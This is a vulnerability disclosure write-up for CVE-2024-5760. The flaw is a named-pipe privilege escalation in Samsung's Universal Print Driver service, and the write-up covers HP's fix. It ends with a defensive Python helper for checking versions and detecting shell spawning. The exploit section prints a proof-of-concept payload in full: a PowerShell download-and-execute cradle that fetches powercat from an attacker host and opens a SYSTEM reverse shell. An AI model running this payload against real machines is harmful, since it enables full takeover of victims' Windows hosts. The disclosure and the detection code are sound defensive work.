October 29, 2024
Episode 16
CVE-2024-5760: LPE + RCE in Samsung’s Universal Print Driver for Windows
Authors: Matthew Bianchi and Hahna Kane Latonick
Introduction
Dark Wolf Solutions recently disclosed to HP Inc. (“HP”) a vulnerability associated with the Samsung Universal Print Driver (UPD) for Windows, running software version V3.00.16.0101 and earlier, that results in local privilege escalation (LPE) and allows for remote code execution (RCE). The Samsung UPD can communicate with many different Samsung printer models without needing to install individual printer-specific drivers for each model. HP continues to support the use of their Windows drivers to help users efficiently connect both HP and Samsung printers to their Windows devices.
Target Analysis
The Samsung Xpress SL-M2070FW Laser Multifunction Printer (Figure 1) uses the Samsung UPD and provides fast high-resolution printing, AirPrint for direct wireless printing, and Wi-Fi Protected Setup (WPS) for connecting the printer to a wireless network.
On the printer’s product page, the Samsung UPD is among a collection of drivers available for download. Once installed, the driver properties can be accessed through the Windows Control Panel. Figure 2 below shows the device options menu for the Samsung UPD and the associated printer.
CVE-2024-5760 Vulnerability
The Samsung UPD installs a service called SecUPDUtilSvc.exe, which is set to autorun in the background on the Windows machine and exposes a named pipe called SamsungUPDUtilPipe. By default, this service runs with administrative permissions and can launch programs, edit the Windows registry, and copy files as SYSTEM. Dark Wolf Solutions discovered that the exposed named pipe can be accessed by a non-privileged user, allowing an attacker to open the pipe directly and use its read/write/execute capabilities with elevated privileges. In addition, remote code execution can be achieved. Our proof-of-concept (PoC) causes the vulnerable service to download and execute a PowerShell script that connects to a listening process on a Linux host, creating a reverse shell that allows the attacker on the Linux host to execute commands as NT AUTHORITY\SYSTEM on the Windows host. This vulnerability was assigned CVE-2024-5760 by HP on September 11, 2024, with an 8.4 severity score.
To evaluate this vulnerability, we used Process Explorer from the Sysinternals suite to verify that SecUPDUtilSvc.exe ran with SYSTEM-level privileges and was set to autorun. As shown in Figure 3, we also used IO Ninja to monitor any data transmitted or received over the SamsungUPDUtilPipe, which was vital during the creation of our PoC.
We identified some limitations while developing the PoC. For example, the PoC must be executed directly on the target machine, which requires local access. Additionally, the target machine needs internet access, because our PoC calls out to the attacker's machine during exploitation. We accounted for these constraints when developing the exploit.
Exploiting CVE-2024-5760
Our goal after discovering the privilege escalation vulnerability was to create a PoC that established a handle to the SamsungUPDUtilPipe and created a reverse shell. Our PoC was primarily inspired by the official Named Pipe Client example written by Microsoft within their Windows App Development API. We modified it to reflect our pipe’s name and changed lpvMessage to direct SecUPDUtilSvc to send the following message to the pipe server:
lpvMessage(L"@=RunAndWaitAsSvc\ncommandLine=cmd.exe /K powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://<Attacker IP>/powercat.ps1'); powercat -c <Attacker IP> -p 4444 -e cmd\"");
On our attacker machine running Ubuntu 22.04 LTS, we ran an HTTP server alongside a netcat listener. Once the attacker machine was ready, we executed our PoC binary on the victim's Windows 10 machine, which then downloaded powercat.ps1 and connected to our netcat listener. After establishing the reverse shell, we were able to execute commands as NT AUTHORITY\SYSTEM on the Windows host, as seen in Figure 4.
Conclusion
After we disclosed this issue to HP, they addressed the vulnerability and released an updated Samsung Universal Print Driver with the incremented version number V3.00.16.0101:01. The latest driver version no longer installs the SecUPDUtilSvc executable and removes any existing instances of SecUPDUtilSvc.exe. HP also published a security bulletin describing the reported vulnerability and their recommended remediation, advising users to update their printer software and drivers by going to the HP Customer Support - Software and Driver Downloads page and searching for their printer model.
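For defenders triaging this advisory, the following added helper (not code from the original write-up, HP, or Samsung) does two things: it compares an installed Samsung UPD version string against the fixed build V3.00.16.0101:01 named above, and it scans process-creation records for the lineage the PoC in the Exploiting section produces, SecUPDUtilSvc.exe spawning a shell as NT AUTHORITY\SYSTEM. The record field names (Sysmon Event ID 1 style) and the service's install path are assumptions, and the sample records are constructed.

```python
"""Triage helpers for CVE-2024-5760 (added example; field names and paths assumed)."""
import re

# Fixed build from HP's advisory: V3.00.16.0101:01. Earlier builds install SecUPDUtilSvc.exe.
FIXED_VERSION = (3, 0, 16, 101, 1)


def parse_version(v: str) -> tuple:
    """'V3.00.16.0101:01' -> (3, 0, 16, 101, 1); a missing ':NN' suffix counts as 0."""
    m = re.fullmatch(r"V?(\d+)\.(\d+)\.(\d+)\.(\d+)(?::(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised UPD version string: {v!r}")
    return tuple(int(x or 0) for x in m.groups())


def is_vulnerable_version(v: str) -> bool:
    """True for V3.00.16.0101 and earlier, i.e. anything below the fixed build."""
    return parse_version(v) < FIXED_VERSION


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
VULN_SERVICE = "secupdutilsvc.exe"


def flag_events(events):
    """Return records where the UPD service launched a shell as SYSTEM.

    This is the parent/child relationship the PoC creates when the service
    runs 'cmd.exe /K powershell ...' on the attacker's behalf.
    """
    hits = []
    for e in events:
        parent = e.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        child = e.get("Image", "").rsplit("\\", 1)[-1].lower()
        is_system = e.get("User", "").upper() == "NT AUTHORITY\\SYSTEM"
        if parent == VULN_SERVICE and child in SHELLS and is_system:
            hits.append(e)
    return hits


# Constructed sample records, not real telemetry. The install directory is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\UPD_INSTALL_DIR\SecUPDUtilSvc.exe",
     "User": r"NT AUTHORITY\SYSTEM", "CommandLine": "cmd.exe /K powershell -c <redacted>"},
    {"Image": r"C:\Windows\System32\spoolsv.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "User": r"NT AUTHORITY\SYSTEM", "CommandLine": "spoolsv.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"DESKTOP\alice", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    print("vulnerable:", is_vulnerable_version("V3.00.16.0101"))  # True
    for hit in flag_events(SAMPLE_EVENTS):
        print("ALERT:", hit["ParentImage"], "->", hit["Image"], "as", hit["User"])
```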